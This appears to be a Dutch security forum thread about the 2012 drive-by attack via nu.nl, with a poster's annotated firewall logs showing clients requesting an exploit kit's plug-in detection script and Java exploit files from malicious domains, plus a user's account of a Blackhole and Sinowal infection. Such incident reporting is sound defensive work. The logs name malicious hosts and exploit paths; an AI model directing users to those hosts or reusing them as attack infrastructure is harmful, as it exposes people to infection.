14-3-2012 11:18:27 - disp=Deny, src_ip=x.x.x.135, dst_ip=66.199.232.98, dst_port=80, rcvd_bytes=0, sent_bytes=269, op=GET, dstname=mops63jger . info, arg=/01O9Kss (deny vanwege contenttype application/java-archive)
14-3-2012 11:18:28 - disp=Deny, src_ip=x.x.x.135, dst_ip=66.199.232.98, dst_port=80, rcvd_bytes=0, sent_bytes=195, op=GET, dstname=mops63jger . info, arg=/Applet.class (deny vanwege *.class)
14-3-2012 11:18:28 - disp=Deny, src_ip=x.x.x.135, dst_ip=66.199.232.98, dst_port=80, rcvd_bytes=0, sent_bytes=195, op=GET, dstname=mops63jger . info, arg=/Applet/class.class (deny vanwege *.class)
14-3-2012 11:20:05 - disp=Allow, src_ip=x.x.x.98, dst_ip=66.199.232.98, dst_port=80, rcvd_bytes=246, sent_bytes=634, op=GET, dstname=mops63jger . info, arg=/i.php
14-3-2012 11:20:06 - disp=Allow, src_ip=x.x.x.98, dst_ip=66.199.232.98, dst_port=80, rcvd_bytes=242, sent_bytes=633, op=GET, dstname=mops63jger . info, arg=/1O9K
- Geen link meer op nu.nl naar exploit site. Veel nu.nl bezoeken maar geen links naar evil websites
14-3-2012 11:36:31 - disp=Allow, src_ip=x.x.x.147, dst_ip=188.95.50.57, dst_port=80, rcvd_bytes=13324, sent_bytes=667, op=GET, dstname=accent6 . in, arg=/index.php?0acb5dbb36f93141b027d416261af42e (sophos op client detecteerd Mal/ExpJS-N)
14-3-2012 11:40:04 - disp=Allow, src_ip=x.x.x.100, dst_ip=188.95.50.57, dst_port=80, rcvd_bytes=13424, sent_bytes=640, op=GET, dstname=accent6 . in, arg=/index.php?0acb5dbb36f93141b027d416261af42e (sophos op client detecteerd Mal/ExpJS-N)
14-3-2012 11:47:15 - disp=Allow, src_ip=x.x.x.94, dst_ip=188.95.50.57, dst_port=80, rcvd_bytes=13257, sent_bytes=667, op=GET, dstname=accent6 . in, arg=/index.php?0acb5dbb36f93141b027d416261af42e (sophos op client detecteerd Mal/ExpJS-N)
- aanvallers veranderen de code om te detecteren welke plug-in aan te vallen continu want Sophos vind niks meer maar aanval gaat door.
14-3-2012 11:49:42 - disp=Allow, src_ip=x.x.x.65, dst_ip=188.95.50.57, dst_port=80, rcvd_bytes=13385, sent_bytes=667, op=GET, dstname=accent6 . in, arg=/index.php?0acb5dbb36f93141b027d416261af42e
14-3-2012 11:49:56 - disp=Deny, src_ip=x.x.x.65, dst_ip=188.95.50.57, dst_port=80, rcvd_bytes=0, sent_bytes=303, op=GET, dstname=accent6 . in, arg=//images/r/f3d091bce8d6b08df676c3bd7801e936.jar (deny vanwege *.jar)
14-3-2012 11:49:56 - disp=Deny, src_ip=x.x.x.65, dst_ip=188.95.50.57, dst_port=80, rcvd_bytes=0, sent_bytes=266, op=GET, dstname=accent6 . in, arg=//images/r/f3d091bce8d6b08df676c3bd7801e936.jar (deny vanwege *.jar)
14-3-2012 11:49:56 - disp=Deny, src_ip=x.x.x.65, dst_ip=188.95.50.57, dst_port=80, rcvd_bytes=0, sent_bytes=303, op=GET, dstname=accent6 . in, arg=//images/r/f3d091bce8d6b08df676c3bd7801e936.jar (deny vanwege *.jar)
14-3-2012 11:49:56 - disp=Deny, src_ip=x.x.x.65, dst_ip=188.95.50.57, dst_port=80, rcvd_bytes=0, sent_bytes=266, op=GET, dstname=accent6 . in, arg=//images/r/f3d091bce8d6b08df676c3bd7801e936.jar (deny vanwege *.jar)
14-3-2012 11:49:56 - disp=Deny, src_ip=x.x.x.65, dst_ip=188.95.50.57, dst_port=80, rcvd_bytes=0, sent_bytes=196, op=GET, dstname=accent6 . in, arg=/Tli/NRJKSumt.class (deny vanwege *.class)
14-3-2012 11:49:56 - disp=Deny, src_ip=x.x.x.65, dst_ip=188.95.50.57, dst_port=80, rcvd_bytes=0, sent_bytes=202, op=GET, dstname=accent6 . in, arg=/Tli/NRJKSumt/class.class (deny vanwege *.class)
14-3-2012 11:49:59 - disp=Allow, src_ip=x.x.x.55, dst_ip=188.95.50.57, dst_port=80, rcvd_bytes=13310, sent_bytes=666, op=GET, dstname=accent6 . in, arg=/index.php?0acb5dbb36f93141b027d416261af42e (Alleen plug-in detectie script opgevraagd geen exploit geserveerd)
14-3-2012 11:52:08 - disp=Allow, src_ip=x.x.x.25, dst_ip=188.95.50.57, dst_port=80, rcvd_bytes=13317, sent_bytes=640, op=GET, dstname=accent6 . in, arg=/index.php?0acb5dbb36f93141b027d416261af42e (Alleen plug-in detectie script opgevraagd geen exploit geserveerd)
14-3-2012 12:00:23 - disp=Allow, src_ip=x.x.x.66, dst_ip=188.95.50.57, dst_port=80, rcvd_bytes=13314, sent_bytes=667, op=GET, dstname=accent6 . in, arg=/index.php?0acb5dbb36f93141b027d416261af42e
14-3-2012 12:00:27 - disp=Deny, src_ip=x.x.x.66, dst_ip=188.95.50.57, dst_port=80, rcvd_bytes=0, sent_bytes=303, op=GET, dstname=accent6 . in, arg=//images/r/f3d091bce8d6b08df676c3bd7801e936.jar (deny vanwege *.jar)
14-3-2012 12:00:27 - disp=Deny, src_ip=x.x.x.66, dst_ip=188.95.50.57, dst_port=80, rcvd_bytes=0, sent_bytes=266, op=GET, dstname=accent6 . in, arg=//images/r/f3d091bce8d6b08df676c3bd7801e936.jar (deny vanwege *.jar)
14-3-2012 12:00:27 - disp=Deny, src_ip=x.x.x.66, dst_ip=188.95.50.57, dst_port=80, rcvd_bytes=0, sent_bytes=303, op=GET, dstname=accent6 . in, arg=//images/r/f3d091bce8d6b08df676c3bd7801e936.jar (deny vanwege *.jar)
14-3-2012 12:00:28 - disp=Deny, src_ip=x.x.x.66, dst_ip=188.95.50.57, dst_port=80, rcvd_bytes=0, sent_bytes=266, op=GET, dstname=accent6 . in, arg=//images/r/f3d091bce8d6b08df676c3bd7801e936.jar (deny vanwege *.jar)
14-3-2012 12:00:28 - disp=Deny, src_ip=x.x.x.66, dst_ip=188.95.50.57, dst_port=80, rcvd_bytes=0, sent_bytes=196, op=GET, dstname=accent6 . in, arg=/Tli/NRJKSumt.class (deny vanwege *.class)
14-3-2012 12:00:28 - disp=Deny, src_ip=x.x.x.66, dst_ip=188.95.50.57, dst_port=80, rcvd_bytes=0, sent_bytes=202, op=GET, dstname=accent6 . in, arg=/Tli/NRJKSumt/class.class (deny vanwege *.class)
Hier stop mijn detectie want nu.nl werd toegevoegd aan blacklist firewall.
09-04-2012, 19:17 door Anoniem
ik had eerst de hacktool keygen/w32. Daarna kreeg ik de virussen java/blacole.ET en ook sinowal. Saillant detail is dat dat keygen ook in mijn MBR zat. Avast detecteerde hem maar toen ie het wou verwijderen crashte de hele pc. Ik heb nu security essentials van Microsoft die de virussen wel met succes kon verwijderen........hoop ik. Want ze kunnen ook nog slapen en alsnog toeslaan als ik inlog bij mijn bank. Verder heb ik ook nog Malwarebytes en TDSS killer. De pc lijkt nu schoon maar doe nog steeds geen enkele bankzaken noch koop ik online en gebruik ook voorlopig geen paypal.
Reageren

Deze posting is gelocked. Reageren is niet meer mogelijk.